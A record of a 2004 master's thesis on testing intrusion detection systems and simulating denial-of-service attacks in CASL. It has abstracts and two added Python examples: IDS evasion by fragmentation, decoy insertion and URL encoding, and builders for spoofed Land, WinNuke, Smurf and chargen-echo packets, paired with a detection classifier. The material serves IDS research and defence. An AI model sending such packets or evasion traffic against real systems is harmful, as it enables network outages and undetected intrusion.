Intrusion Detection System Testing and Denial-of-Service Attack Simulation Based on CASL
  • English title: Intrusion Detection Systems Tests and Denial of Service Attacks Simulation Based-on CASL
  • Author: 赵阔
  • Degree level: Master's
  • Discipline: Computer Architecture (计算机系统结构)
  • Degree year: 2004
  • Supervisor: 胡亮
  • Discipline code: 081201
  • Degree-granting institution: 吉林大学 (Jilin University)
  • Thesis submission date: 2004-04-01
Abstract (translated from the Chinese)
With the rapid expansion of the Internet, the number of computer security incidents grows at an alarming rate every year, and network security receives ever more attention. As an indispensable component of computer security, intrusion detection systems (IDS) are now widely deployed, and the need to test and evaluate them is becoming increasingly pressing. Developers hope that testing and evaluation will reveal shortcomings in their products; users hope it will help them choose a suitable intrusion detection product.
    At present there is little domestic research on testing intrusion detection systems, and we have carried out some preliminary work: we wrote test programs in the CASL language, selected representative current intrusion detection systems for intrusion-recognition tests, and verified the functional characteristics of these IDSs in a typical network environment. By analysing the test results we evaluate current intrusion detection technology. In addition, we studied the mechanisms of denial-of-service (DoS) attacks in depth and used CASL to simulate four typical DoS attacks.
    This work was made possible by an effective security tool, the Custom Audit Scripting Language (CASL). CASL is a high-level programming language that provides a variety of packet templates and complete network programming facilities, so programs that simulate low-level attacks or perform information-gathering checks on a network can be written conveniently. Its syntax closely resembles C and is not hard to master. At the same time it has the characteristics of a scripting language: programs are executed by an interpreter and do not consume large amounts of memory or CPU.
    We wrote twenty-five test programs that simulate the "PHF" web server attack. PHF was chosen because every IDS under test can detect it and it is simple to simulate: the attack signature is the string "GET /cgi-bin/phf?". Moreover, the corresponding vulnerability no longer exists on the target host, so the host suffers no real damage. The test programs use the classic "insertion" and "evasion" techniques to interfere with the IDS, in order to verify its functional characteristics.
    All tests were run on a 10 Mbit/s Ethernet LAN connected to the Internet through a router. Three hosts are required: the host running the test programs, the target host, and a monitoring host. The representative intrusion detection systems were installed and configured in turn on the target host, with the attacked port, 80, open. The monitoring host records the network traffic during each attack so that it can be replayed and analysed later. All test programs were then run in sequence and the output of the intrusion detection system recorded to obtain the test results.
    Our results show that intrusion detection systems that rely on passive protocol analysis to collect data have inherent weaknesses: an attacker can use a variety of deception and interference techniques to evade detection. For various reasons, vendors tend to exaggerate what their intrusion detection systems can do. Newer techniques such as intrusion prevention may be the solution in future.
    Since denial-of-service (DoS) attacks first appeared they have caused enormous economic losses every year, and with the emergence of automated DoS attack tools the threat they pose to network security grows steadily more serious. Current research on DoS attacks concentrates mainly on detection and response mechanisms; little work examines the concrete details of the attacks themselves. We collected a large amount of related information, studied the mechanisms of DoS attacks in depth, and used CASL to simulate four typical DoS attacks: Land, WinNuke, Smurf and the chargen-echo loop. The first two are resource-starvation attacks; the latter two are bandwidth-consumption attacks.
    To this day the DoS problem has not changed much. Resources such as bandwidth and memory are always finite and therefore vulnerable to "consumption" attacks, and the Internet still contains a great many insecure (poorly hardened) systems that attackers can use to launch DoS attacks. The simulation programs we wrote should help researchers understand the nature of DoS attacks more deeply and find more effective ways to defend against them.
English abstract (as provided with the thesis)
With the rapid development of the Internet, there have been an increasing number of computer security incidents every year, and more attention has been paid to network security. As an indispensable instrument of computer security, intrusion detection systems (IDS) have been applied broadly, and there is an urgent need to test and evaluate them. Developers hope to find flaws by testing and evaluating IDSs, and consumers expect that testing and evaluation will help them select proper products.
    At present, limited progress has been made in testing IDSs, and we have made some preliminary efforts. We wrote test programs in the Custom Audit Scripting Language to simulate real network attacks (intrusions). Intrusion signature identification tests were performed on currently typical intrusion detection systems to validate their functional characteristics in a representative network environment. A summary evaluation of general intrusion detection technique is presented after analysing the test results. Meanwhile, we researched the methodology of Denial-of-Service (DoS) attacks in depth and simulated four typical DoS attacks in CASL.
    We could carry out this research thanks to the Custom Audit Scripting Language (CASL), a powerful security tool. CASL is a high-level programming language that provides various packet templates and powerful network programming functionality, and can easily be used to write programs that simulate low-level attacks or information-gathering checks on networks. CASL is similar to C in syntax, easy to learn, and used like a shell-script language. CASL programs are executed by interpretation and do not consume large amounts of memory and CPU.
    Twenty-five test programs were written to simulate the "PHF" web server attack. We chose this attack because all the IDSs can detect it and it is easy to simulate, the attack signature being a specific string ("GET /cgi-bin/phf?"). What's more, the victim host will not be compromised because the vulnerability no longer exists on it. These test programs use insertion and evasion attack methods to disturb the IDSs in order to validate their functionality.
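The insertion and evasion techniques named here (and in the corresponding paragraph of the Chinese abstract) can be shown against the PHF signature in a few lines. The following is an added example in plain Python, not one of the thesis's CASL test programs: it models a TCP stream as a list of segments, a victim that silently drops some of them, and three signature matchers of increasing care. The segment model, the victim's accept rule (`host_drops`, standing in for a bad checksum or a TTL that expires before the host) and the sample request are constructed assumptions.

```python
"""Insertion and evasion against a string-signature IDS, in the spirit of the
PHF tests described above. Added example (plain Python, not the thesis's CASL
scripts); the segment model, the victim's accept rule and the sample request
are constructed assumptions."""
from dataclasses import dataclass
from typing import Callable, Dict, List
from urllib.parse import unquote_to_bytes

SIGNATURE = b"GET /cgi-bin/phf?"   # the string the tested IDSs matched on


@dataclass
class Segment:
    seq: int                  # offset of this segment's first byte in the TCP stream
    data: bytes
    host_drops: bool = False  # constructed: bad TCP checksum, or TTL expiring before the host


def host_accepts(seg: Segment) -> bool:
    """The victim's stack verifies checksums and never sees expired packets."""
    return not seg.host_drops


def reassemble(segments: List[Segment],
               accept: Callable[[Segment], bool] = lambda s: True) -> bytes:
    """Rebuild the byte stream; where segments overlap, the first-seen byte wins."""
    stream: Dict[int, int] = {}
    for seg in segments:
        if accept(seg):
            for i, b in enumerate(seg.data):
                stream.setdefault(seg.seq + i, b)
    return bytes(stream[k] for k in sorted(stream))


def naive_ids(segments: List[Segment]) -> bool:
    """Per-packet matching: the signature must sit entirely inside one segment."""
    return any(SIGNATURE in seg.data for seg in segments)


def reassembling_ids(segments: List[Segment]) -> bool:
    """Stream matching, but trusting every packet seen on the wire."""
    return SIGNATURE in reassemble(segments)


def hardened_ids(segments: List[Segment]) -> bool:
    """Stream matching that drops what the host drops and URL-decodes as the CGI would."""
    return SIGNATURE in unquote_to_bytes(reassemble(segments, host_accepts))


def victim_attacked(segments: List[Segment]) -> bool:
    """Ground truth: does the PHF request actually reach the CGI on the victim?"""
    return SIGNATURE in unquote_to_bytes(reassemble(segments, host_accepts))


# constructed request; the query string is benign
REQUEST = b"GET /cgi-bin/phf?Qalias=x HTTP/1.0\r\n\r\n"

SCENARIOS = {
    "baseline": [Segment(0, REQUEST)],
    # evasion: the signature is split across three segments, none holds it whole
    "fragmented": [Segment(0, REQUEST[:8]), Segment(8, REQUEST[8:14]), Segment(14, REQUEST[14:])],
    # insertion: a decoy the IDS accepts but the host drops overlaps the real bytes
    "inserted": [Segment(0, REQUEST[:13]), Segment(13, b"xyz?", host_drops=True),
                 Segment(13, REQUEST[13:])],
    # evasion: URL-encoding one character defeats the literal string match
    "encoded": [Segment(0, REQUEST.replace(b"phf?", b"%70hf?"))],
}


def evaluate(segments: List[Segment]) -> Dict[str, bool]:
    """Which detectors fire, and whether the attack really reached the victim."""
    return {"naive": naive_ids(segments), "reassembling": reassembling_ids(segments),
            "hardened": hardened_ids(segments), "victim": victim_attacked(segments)}


if __name__ == "__main__":
    for name, segs in SCENARIOS.items():
        print(f"{name:11s}", evaluate(segs))
```

The "hardened" matcher only works because it knows exactly which segments the victim will discard; a passive sensor in the real network does not know the victim's hop distance or the quirks of its TCP stack, which is the fundamental limitation the test results below refer to.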
    All tests were conducted on a 10BaseT Ethernet connected to the Internet through a router. Three hosts are needed: the test host, the victim host and the monitor host. The IDSs are installed and configured on the victim host in turn, and port 80 is opened as the victim port. The monitor host logs the network traffic so that it can be replayed later. We then execute all test programs, record the output of the IDSs and obtain the test results.
    Our test results indicate that all intrusion detection systems that rely upon passive protocol analysis to collect data are fundamentally flawed: attackers may use various methods to deceive and confuse an IDS and evade its detection. Vendors make many exaggerated claims for their products for various reasons. New techniques (such as intrusion prevention) may be an alternative approach in future.
    Since the first denial-of-service (DoS) attack appeared, DoS attacks have caused significant financial damage every year. With the development of automated DoS attack tools, DoS attacks pose an ever greater threat to network security. At present most researchers focus on attack detection and response mechanisms, and limited progress has been made on the details of the DoS attacks themselves. We collected a large amount of related information and researched the methodology of DoS attacks in depth. Four typical DoS attacks, namely Land, WinNuke, Smurf and the chargen-echo loop, are simulated in CASL. Land and WinNuke are resource-starvation DoS attacks, while Smurf and the chargen-echo loop are bandwidth-consumption DoS attacks.
    The problem of DoS attacks has not changed significantly in recent years. Resources (such as bandwidth and memory) remain limited and susceptible to consumption attacks, and there are still a great many weak or improperly secured systems that attackers can use to launch DoS attacks. The programs we wrote to simulate DoS attacks should help researchers understand the nature of DoS attacks more deeply and find more effective ways to prevent them.
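The four attacks listed here (and in the matching paragraph of the Chinese abstract) each reduce to one characteristic packet. The block below is an added example in plain Python using `struct`, not the thesis's CASL scripts: it builds each packet with correct IPv4, TCP, UDP and ICMP checksums, and pairs the builders with a single-packet classifier of the kind a signature IDS would run. All addresses, ports, sequence numbers and payloads are constructed, and the Smurf rule assumes /24 networks so that an address ending in .255 is the directed-broadcast address.

```python
"""Craft and recognise the four DoS packets named above: Land, WinNuke, Smurf and
the chargen-echo loop. Added example in plain Python/struct (not the thesis's CASL
scripts); addresses, ports and the /24 broadcast rule are constructed assumptions."""
import socket
import struct
from typing import Optional


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum used by IPv4, ICMP, TCP and UDP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def pseudo(src: str, dst: str, proto: int, length: int) -> bytes:
    """TCP/UDP pseudo-header that is prepended to the segment for checksumming."""
    return socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, proto, length)


def ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    # version 4, IHL 5, no options; identification and TTL are arbitrary constructed values
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:] + payload


def tcp(src: str, dst: str, sport: int, dport: int, flags: int, data: bytes = b"", urg: int = 0) -> bytes:
    seg = struct.pack("!HHIIHHHH", sport, dport, 0x1000, 0, (5 << 12) | flags, 8192, 0, urg) + data
    csum = checksum(pseudo(src, dst, 6, len(seg)) + seg)
    return seg[:16] + struct.pack("!H", csum) + seg[18:]


def udp(src: str, dst: str, sport: int, dport: int, data: bytes) -> bytes:
    seg = struct.pack("!HHHH", sport, dport, 8 + len(data), 0) + data
    csum = checksum(pseudo(src, dst, 17, len(seg)) + seg)
    return seg[:6] + struct.pack("!H", csum) + seg[8:]


def icmp_echo(data: bytes = b"ping") -> bytes:
    hdr = struct.pack("!BBHHH", 8, 0, 0, 1, 1) + data   # type 8 = echo request
    return hdr[:2] + struct.pack("!H", checksum(hdr)) + hdr[4:]


SYN, URG, PSH, ACK = 0x02, 0x20, 0x08, 0x10


def land(victim: str, port: int = 139) -> bytes:
    """Land: a SYN whose source address and port equal its destination address and port."""
    return ipv4(victim, victim, 6, tcp(victim, victim, port, port, SYN))


def winnuke(attacker: str, victim: str) -> bytes:
    """WinNuke: out-of-band (URG) data sent to the NetBIOS session port 139."""
    data = b"OOB"
    return ipv4(attacker, victim, 6, tcp(attacker, victim, 4444, 139, URG | PSH | ACK, data, urg=len(data)))


def smurf(victim: str, directed_broadcast: str) -> bytes:
    """Smurf: ICMP echo request to a network's broadcast address, source spoofed to the victim."""
    return ipv4(victim, directed_broadcast, 1, icmp_echo())


def chargen_echo(host_a: str, host_b: str) -> bytes:
    """chargen-echo loop: one spoofed UDP datagram between chargen (19) and echo (7)."""
    return ipv4(host_a, host_b, 17, udp(host_a, host_b, 19, 7, b"go"))


def checksums_ok(pkt: bytes) -> bool:
    """Recompute every checksum: a correct one sums to zero with the field included."""
    ihl = (pkt[0] & 0x0F) * 4
    src, dst, proto, l4 = socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20]), pkt[9], pkt[ihl:]
    if checksum(pkt[:ihl]) != 0:
        return False
    if proto in (6, 17):
        return checksum(pseudo(src, dst, proto, len(l4)) + l4) == 0
    return checksum(l4) == 0


def classify(pkt: bytes) -> Optional[str]:
    """Single-packet signatures for the four attacks, as a signature IDS would match them."""
    ihl = (pkt[0] & 0x0F) * 4
    src, dst, proto, l4 = socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20]), pkt[9], pkt[ihl:]
    if proto == 6:
        sport, dport = struct.unpack("!HH", l4[:4])
        if src == dst and sport == dport:
            return "land"
        if dport == 139 and l4[13] & URG:
            return "winnuke"
    elif proto == 17:
        sport, dport = struct.unpack("!HH", l4[:4])
        if sport in (7, 19) and dport in (7, 19):
            return "chargen-echo"
    elif proto == 1 and l4[0] == 8 and dst.endswith(".255"):
        return "smurf"   # assumption: /24 subnets, so .255 is the directed-broadcast address
    return None


if __name__ == "__main__":
    for name, pkt in [("land", land("10.0.0.5")), ("winnuke", winnuke("10.0.0.9", "10.0.0.5")),
                      ("smurf", smurf("10.0.0.5", "192.168.1.255")),
                      ("chargen-echo", chargen_echo("10.0.0.1", "10.0.0.2"))]:
        print(f"{name:13s} checksums_ok={checksums_ok(pkt)} classified_as={classify(pkt)}")
```

The builders only produce bytes; putting them on the wire needs a raw socket, root privileges and a network you are authorised to test, as in the isolated LAN the thesis describes. Note that the Smurf signature above is the one visible at the amplifier network (echo request to a broadcast address); at the victim the symptom is a flood of echo replies from many hosts, which no single packet reveals.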